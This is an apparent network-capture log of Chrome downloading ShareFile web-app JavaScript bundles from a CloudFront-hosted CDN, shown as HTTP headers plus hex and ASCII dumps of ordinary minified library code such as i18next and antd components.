                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 119043
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Fri, 04 Oct 2024 14:34:00 GMT
                                                                                                                                                                                                                                                                                ETag: "c6fd21e7e412186282d2436a3067aad3"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 cb33a7a4640adbb55df3e0d143601558.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: X_JHdPUtJ2im6UQ_YGjVAEURrMGqp5TJS4oQ61NYX2ZHobd6unC4NQ==
                                                                                                                                                                                                                                                                                Age: 45982
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 76 69 65 77 65 6e 67 69 6e 65 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6f 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevviewuserpilet,{})System.register(["@sharefiledev/antd-config","antd","react","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={};return Object.defineProperty(o,"__esModule"
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 73 6c 61 74 69 6f 6e 22 7d 3b 72 65 74 75 72 6e 28 30 2c 61 2e 5a 29 28 74 68 69 73 2c 6e 29 2c 72 3d 74 2e 63 61 6c 6c 28 74 68 69 73 29 2c 44 26 26 6b 2e 63 61 6c 6c 28 28 30 2c 75 2e 5a 29 28 72 29 29 2c 72 2e 64 61 74 61 3d 65 7c 7c 7b 7d 2c 72 2e 6f 70 74 69 6f 6e 73 3d 6f 2c 72 2e 6f 70 74 69 6f 6e 73 2e 6b 65 79 53 65 70 61 72 61 74 6f 72 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 72 2e 6f 70 74 69 6f 6e 73 2e 6b 65 79 53 65 70 61 72 61 74 6f 72 3d 22 2e 22 29 2c 72 2e 6f 70 74 69 6f 6e 73 2e 69 67 6e 6f 72 65 4a 53 4f 4e 53 74 72 75 63 74 75 72 65 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 72 2e 6f 70 74 69 6f 6e 73 2e 69 67 6e 6f 72 65 4a 53 4f 4e 53 74 72 75 63 74 75 72 65 3d 21 30 29 2c 72 7d 72 65 74 75 72 6e 28 30 2c 73 2e 5a 29 28 6e 2c
                                                                                                                                                                                                                                                                                Data Ascii: slation"};return(0,a.Z)(this,n),r=t.call(this),D&&k.call((0,u.Z)(r)),r.data=e||{},r.options=o,r.options.keySeparator===undefined&&(r.options.keySeparator="."),r.options.ignoreJSONStructure===undefined&&(r.options.ignoreJSONStructure=!0),r}return(0,s.Z)(n,
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 65 6c 22 2c 22 65 6e 22 2c 22 65 6f 22 2c 22 65 73 22 2c 22 65 74 22 2c 22 65 75 22 2c 22 66 69 22 2c 22 66 6f 22 2c 22 66 75 72 22 2c 22 66 79 22 2c 22 67 6c 22 2c 22 67 75 22 2c 22 68 61 22 2c 22 68 69 22 2c 22 68 75 22 2c 22 68 79 22 2c 22 69 61 22 2c 22 69 74 22 2c 22 6b 6b 22 2c 22 6b 6e 22 2c 22 6b 75 22 2c 22 6c 62 22 2c 22 6d 61 69 22 2c 22 6d 6c 22 2c 22 6d 6e 22 2c 22 6d 72 22 2c 22 6e 61 68 22 2c 22 6e 61 70 22 2c 22 6e 62 22 2c 22 6e 65 22 2c 22 6e 6c 22 2c 22 6e 6e 22 2c 22 6e 6f 22 2c 22 6e 73 6f 22 2c 22 70 61 22 2c 22 70 61 70 22 2c 22 70 6d 73 22 2c 22 70 73 22 2c 22 70 74 2d 50 54 22 2c 22 72 6d 22 2c 22 73 63 6f 22 2c 22 73 65 22 2c 22 73 69 22 2c 22 73 6f 22 2c 22 73 6f 6e 22 2c 22 73 71 22 2c 22 73 76 22 2c 22 73 77 22 2c 22 74 61 22
                                                                                                                                                                                                                                                                                Data Ascii: el","en","eo","es","et","eu","fi","fo","fur","fy","gl","gu","ha","hi","hu","hy","ia","it","kk","kn","ku","lb","mai","ml","mn","mr","nah","nap","nb","ne","nl","nn","no","nso","pa","pap","pms","ps","pt-PT","rm","sco","se","si","so","son","sq","sv","sw","ta"
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC14808INData Raw: 65 7d 29 29 7d 7d 2c 7b 6b 65 79 3a 22 72 65 61 64 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6f 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 33 26 26 61 72 67 75 6d 65 6e 74 73 5b 33 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 33 5d 3a 30 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 34 26 26 61 72 67 75 6d 65 6e 74 73 5b 34 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 34 5d 3a 74 68 69 73 2e 72 65 74 72 79 54 69 6d 65 6f 75 74 2c 61 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 35 3f 61 72 67 75 6d 65 6e 74 73 5b 35 5d 3a 75 6e 64 65 66 69 6e 65 64 3b 72 65 74 75 72 6e 20 65 2e 6c 65 6e 67 74 68 3f 74 68 69
                                                                                                                                                                                                                                                                                Data Ascii: e}))}},{key:"read",value:function(e,t,n){var r=this,o=arguments.length>3&&arguments[3]!==undefined?arguments[3]:0,i=arguments.length>4&&arguments[4]!==undefined?arguments[4]:this.retryTimeout,a=arguments.length>5?arguments[5]:undefined;return e.length?thi
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC350INData Raw: 73 22 2c 22 70 62 74 22 2c 22 70 62 75 22 2c 22 70 73 74 22 2c 22 70 72 70 22 2c 22 70 72 64 22 2c 22 75 67 22 2c 22 75 72 22 2c 22 79 64 64 22 2c 22 79 64 73 22 2c 22 79 69 68 22 2c 22 6a 69 22 2c 22 79 69 22 2c 22 68 62 6f 22 2c 22 6d 65 6e 22 2c 22 78 6d 6e 22 2c 22 66 61 22 2c 22 6a 70 72 22 2c 22 70 65 6f 22 2c 22 70 65 73 22 2c 22 70 72 73 22 2c 22 64 76 22 2c 22 73 61 6d 22 2c 22 63 6b 62 22 5d 2e 69 6e 64 65 78 4f 66 28 74 68 69 73 2e 73 65 72 76 69 63 65 73 2e 6c 61 6e 67 75 61 67 65 55 74 69 6c 73 2e 67 65 74 4c 61 6e 67 75 61 67 65 50 61 72 74 46 72 6f 6d 43 6f 64 65 28 65 29 29 3e 2d 31 7c 7c 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 2d 61 72 61 62 22 29 3e 31 3f 22 72 74 6c 22 3a 22 6c 74 72 22 7d 7d 2c 7b 6b
                                                                                                                                                                                                                                                                                Data Ascii: s","pbt","pbu","pst","prp","prd","ug","ur","ydd","yds","yih","ji","yi","hbo","men","xmn","fa","jpr","peo","pes","prs","dv","sam","ckb"].indexOf(this.services.languageUtils.getLanguagePartFromCode(e))>-1||e.toLowerCase().indexOf("-arab")>1?"rtl":"ltr"}},{k
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 68 65 2c 6f 3d 64 65 28 64 65 28 64 65 28 7b 7d 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 29 2c 74 29 2c 7b 69 73 43 6c 6f 6e 65 3a 21 30 7d 29 2c 69 3d 6e 65 77 20 6e 28 6f 29 3b 74 2e 64 65 62 75 67 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 74 2e 70 72 65 66 69 78 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 7c 7c 28 69 2e 6c 6f 67 67 65 72 3d 69 2e 6c 6f 67 67 65 72 2e 63 6c 6f 6e 65 28 74 29 29 3b 72 65 74 75 72 6e 5b 22 73 74 6f 72 65 22 2c 22 73 65 72 76 69 63 65 73 22 2c 22 6c 61 6e 67 75 61 67 65 22 5d 2e 66 6f 72 45 61 63 68 28 28 66 75
                                                                                                                                                                                                                                                                                Data Ascii: rguments[0]:{},r=arguments.length>1&&arguments[1]!==undefined?arguments[1]:he,o=de(de(de({},this.options),t),{isClone:!0}),i=new n(o);t.debug===undefined&&t.prefix===undefined||(i.logger=i.logger.clone(t));return["store","services","language"].forEach((fu
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 6b 22 2c 22 63 68 69 6c 64 72 65 6e 22 5d 2c 49 3d 72 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 65 2e 63 6c 61 73 73 4e 61 6d 65 2c 61 3d 65 2e 63 6f 6d 70 6f 6e 65 6e 74 2c 6c 3d 65 2e 76 69 65 77 42 6f 78 2c 66 3d 65 2e 73 70 69 6e 2c 70 3d 65 2e 72 6f 74 61 74 65 2c 64 3d 65 2e 74 61 62 49 6e 64 65 78 2c 68 3d 65 2e 6f 6e 43 6c 69 63 6b 2c 6d 3d 65 2e 63 68 69 6c 64 72 65 6e 2c 79 3d 28 30 2c 75 2e 5a 29 28 65 2c 5f 29 2c 62 3d 72 2e 75 73 65 52 65 66 28 29 2c 77 3d 67 28 62 2c 74 29 3b 5a 28 42 6f 6f 6c 65 61 6e 28 61 7c 7c 6d 29 2c 22 53 68 6f 75 6c 64 20 68 61 76 65 20 60 63 6f 6d 70 6f 6e 65 6e 74 60 20 70 72 6f 70 20 6f 72 20 60 63 68 69 6c 64 72 65 6e 60 2e 22 29 2c 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                                                Data Ascii: k","children"],I=r.forwardRef((function(e,t){var n=e.className,a=e.component,l=e.viewBox,f=e.spin,p=e.rotate,d=e.tabIndex,h=e.onClick,m=e.children,y=(0,u.Z)(e,_),b=r.useRef(),w=g(b,t);Z(Boolean(a||m),"Should have `component` prop or `children`."),function
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 65 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 69 7d 2c 33 34 38 38 30 3a 65 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 61 7d 2c 35 30 39 37 38 3a 65 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 73 7d 2c 31 37 30 36 31 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 76 61 72 20 72 3d 6e 28 31 38 36 39 38 29 5b 22 64 65 66 61 75 6c 74 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 65 2e 65 78 70 6f 72 74 73 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3d 21 30 2c 65 2e 65 78 70 6f 72 74 73 5b 22 64 65 66 61 75 6c 74 22 5d 3d 65 2e 65 78 70 6f 72
                                                                                                                                                                                                                                                                                Data Ascii: e=>{"use strict";e.exports=i},34880:e=>{"use strict";e.exports=a},50978:e=>{"use strict";e.exports=s},17061:(e,t,n)=>{var r=n(18698)["default"];function o(){"use strict";e.exports=o=function(){return n},e.exports.__esModule=!0,e.exports["default"]=e.expor
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC5581INData Raw: 26 26 6e 2e 74 61 72 67 65 74 2e 68 72 65 66 7c 7c 74 2c 75 3d 6e 65 77 20 45 72 72 6f 72 28 22 4c 6f 61 64 69 6e 67 20 43 53 53 20 63 68 75 6e 6b 20 22 2b 65 2b 22 20 66 61 69 6c 65 64 2e 5c 6e 28 22 2b 73 2b 22 29 22 29 3b 75 2e 63 6f 64 65 3d 22 43 53 53 5f 43 48 55 4e 4b 5f 4c 4f 41 44 5f 46 41 49 4c 45 44 22 2c 75 2e 74 79 70 65 3d 61 2c 75 2e 72 65 71 75 65 73 74 3d 73 2c 69 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 69 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 69 29 2c 6f 28 75 29 7d 7d 2c 69 2e 68 72 65 66 3d 74 2c 6e 3f 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 69 2c 6e 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 3a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64
                                                                                                                                                                                                                                                                                Data Ascii: &&n.target.href||t,u=new Error("Loading CSS chunk "+e+" failed.\n("+s+")");u.code="CSS_CHUNK_LOAD_FAILED",u.type=a,u.request=s,i.parentNode&&i.parentNode.removeChild(i),o(u)}},i.href=t,n?n.parentNode.insertBefore(i,n.nextSibling):document.head.appendChild


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                140192.168.2.64987013.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC601OUTGET /sharefile-web/sharefiledev-client-dashboard/0.164.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 424707
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 07 Oct 2024 15:53:38 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Tue, 08 Oct 2024 18:49:11 GMT
                                                                                                                                                                                                                                                                                ETag: "084ddca8eb1d6bfe21f54c9820777876"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 c7f7b4cf7fd5efe64bac95586db3f62a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: XxMDSFE8SmkZYXI9GrRS4nxSagcDJQmbYQ-FDVjcm1Vq5U5w5ACzCA==
                                                                                                                                                                                                                                                                                Age: 83773
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 63 6c 69 65 6e 74 64 61 73 68 62 6f 61 72 64 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 6c 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6c 2c 22 5f 5f 65 73 4d 6f 64 75
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevclientdashboard,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},l={},i={},a={};return Object.defineProperty(l,"__esModu
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 70 70 65 6e 64 4e 61 6d 65 73 70 61 63 65 54 6f 4d 69 73 73 69 6e 67 4b 65 79 3f 22 22 2e 63 6f 6e 63 61 74 28 64 2c 22 3a 22 29 2e 63 6f 6e 63 61 74 28 75 29 3a 75 2c 52 3f 76 3a 75 6e 64 65 66 69 6e 65 64 29 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 72 73 65 4d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 28 76 29 29 7d 72 65 74 75 72 6e 20 69 3f 28 70 2e 72 65 73 3d 76 2c 70 29 3a 76 7d 7d 2c 7b 6b 65 79 3a 22 65 78 74 65 6e 64 54 72 61 6e 73 6c 61 74 69 6f 6e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 6f 29 7b 76 61 72 20 6c 3d 74 68 69 73 3b 69 66 28 74 68 69 73 2e 69 31 38 6e 46 6f 72 6d 61 74 26 26 74 68 69 73 2e 69 31 38 6e 46 6f 72 6d 61 74 2e 70 61 72 73 65 29 65 3d 74 68 69 73 2e 69 31 38 6e 46 6f 72 6d
                                                                                                                                                                                                                                                                                Data Ascii: ppendNamespaceToMissingKey?"".concat(d,":").concat(u):u,R?v:undefined):this.options.parseMissingKeyHandler(v))}return i?(p.res=v,p):v}},{key:"extendTranslation",value:function(e,t,n,r,o){var l=this;if(this.i18nFormat&&this.i18nFormat.parse)e=this.i18nForm
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 3d 74 68 69 73 2c 6c 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 7b 7d 2c 69 3d 65 65 28 7b 7d 2c 6c 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 2e 6e 65 73 74 69 6e 67 4f 70 74 69 6f 6e 73 53 65 70 61 72 61 74 6f 72 3b 69 66 28 65 2e 69 6e 64 65 78 4f 66 28 6e 29 3c 30 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 72 3d 65 2e 73 70 6c 69 74 28 6e 65 77 20 52 65 67 45 78 70 28 22 22 2e 63 6f 6e 63 61 74 28 6e 2c 22 5b 20 5d 2a 7b 22 29 29 29 2c 6f 3d 22 7b 22 2e 63 6f 6e 63 61 74 28 72 5b 31 5d 29 3b 65 3d 72 5b 30 5d 3b 76 61 72 20
                                                                                                                                                                                                                                                                                Data Ascii: tion(e,t){var n,r,o=this,l=arguments.length>2&&arguments[2]!==undefined?arguments[2]:{},i=ee({},l);function a(e,t){var n=this.nestingOptionsSeparator;if(e.indexOf(n)<0)return e;var r=e.split(new RegExp("".concat(n,"[ ]*{"))),o="{".concat(r[1]);e=r[0];var
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC15229INData Raw: 31 5d 3a 70 65 2c 72 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 3a 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 6e 3d 65 29 2c 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 73 6f 75 72 63 65 73 7c 7c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 72 74 69 61 6c 42 75 6e 64 6c 65 64 4c 61 6e 67 75 61 67 65 73 29 7b 69 66 28 72 26 26 22 63 69 6d 6f 64 65 22 3d 3d 3d 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 72 65 74 75 72 6e 20 6e 28 29 3b 76 61 72 20 6f 3d 5b 5d 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 74 2e 73 65 72 76 69 63 65 73 2e 6c 61 6e 67 75 61 67 65 55 74 69 6c 73 2e 74 6f 52 65 73 6f 6c 76 65 48 69 65 72 61 72 63 68 79 28 65 29 2e 66
                                                                                                                                                                                                                                                                                Data Ascii: 1]:pe,r="string"==typeof e?e:this.language;if("function"==typeof e&&(n=e),!this.options.resources||this.options.partialBundledLanguages){if(r&&"cimode"===r.toLowerCase())return n();var o=[],l=function(e){e&&t.services.languageUtils.toResolveHierarchy(e).f
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC12792INData Raw: 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 72 3d 72 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 74 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 72 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 4c 65 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6e 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 3b 74 25 32 3f 53 65 28 4f 62 6a 65 63 74 28 6e 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75
                                                                                                                                                                                                                                                                                Data Ascii: opertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function Le(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?Se(Object(n),!0).forEach((fu
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC12792INData Raw: 78 53 68 72 69 6e 6b 3a 31 2c 66 6c 65 78 4e 65 67 61 74 69 76 65 3a 31 2c 66 6c 65 78 4f 72 64 65 72 3a 31 2c 67 72 69 64 52 6f 77 3a 31 2c 67 72 69 64 52 6f 77 45 6e 64 3a 31 2c 67 72 69 64 52 6f 77 53 70 61 6e 3a 31 2c 67 72 69 64 52 6f 77 53 74 61 72 74 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 45 6e 64 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 53 70 61 6e 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 53 74 61 72 74 3a 31 2c 6d 73 47 72 69 64 52 6f 77 3a 31 2c 6d 73 47 72 69 64 52 6f 77 53 70 61 6e 3a 31 2c 6d 73 47 72 69 64 43 6f 6c 75 6d 6e 3a 31 2c 6d 73 47 72 69 64 43 6f 6c 75 6d 6e 53 70 61 6e 3a 31 2c 66 6f 6e 74 57 65 69 67 68 74 3a 31 2c 6c 69 6e 65 48 65 69 67 68 74 3a 31 2c 6f 70 61 63 69 74 79 3a 31 2c 6f 72 64 65
                                                                                                                                                                                                                                                                                Data Ascii: xShrink:1,flexNegative:1,flexOrder:1,gridRow:1,gridRowEnd:1,gridRowSpan:1,gridRowStart:1,gridColumn:1,gridColumnEnd:1,gridColumnSpan:1,gridColumnStart:1,msGridRow:1,msGridRowSpan:1,msGridColumn:1,msGridColumnSpan:1,fontWeight:1,lineHeight:1,opacity:1,orde
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC12792INData Raw: 64 61 72 79 43 6f 6e 74 61 69 6e 65 72 42 61 63 6b 67 72 6f 75 6e 64 3a 61 2e 44 47 2e 67 72 65 79 31 30 30 7d 2c 64 3d 28 30 2c 69 2e 5a 29 28 28 30 2c 69 2e 5a 29 28 7b 7d 2c 73 29 2c 7b 7d 2c 7b 70 72 69 6d 61 72 79 3a 61 2e 44 47 2e 74 65 61 6c 37 30 30 2c 61 63 74 69 6f 6e 3a 61 2e 44 47 2e 74 65 61 6c 37 30 30 2c 61 63 74 69 6f 6e 48 6f 76 65 72 3a 61 2e 44 47 2e 74 65 61 6c 38 30 30 2c 6c 69 73 74 49 74 65 6d 53 65 6c 65 63 74 65 64 42 61 63 6b 67 72 6f 75 6e 64 3a 61 2e 44 47 2e 74 65 61 6c 31 30 30 2c 61 63 74 69 76 65 54 61 62 3a 61 2e 44 47 2e 74 65 61 6c 37 30 30 2c 61 63 63 65 6e 74 43 6f 6c 6f 72 3a 61 2e 44 47 2e 74 65 61 6c 37 30 30 7d 29 2c 68 3d 28 30 2c 69 2e 5a 29 28 28 30 2c 69 2e 5a 29 28 7b 7d 2c 73 29 2c 7b 7d 2c 7b 70 72 69 6d 61
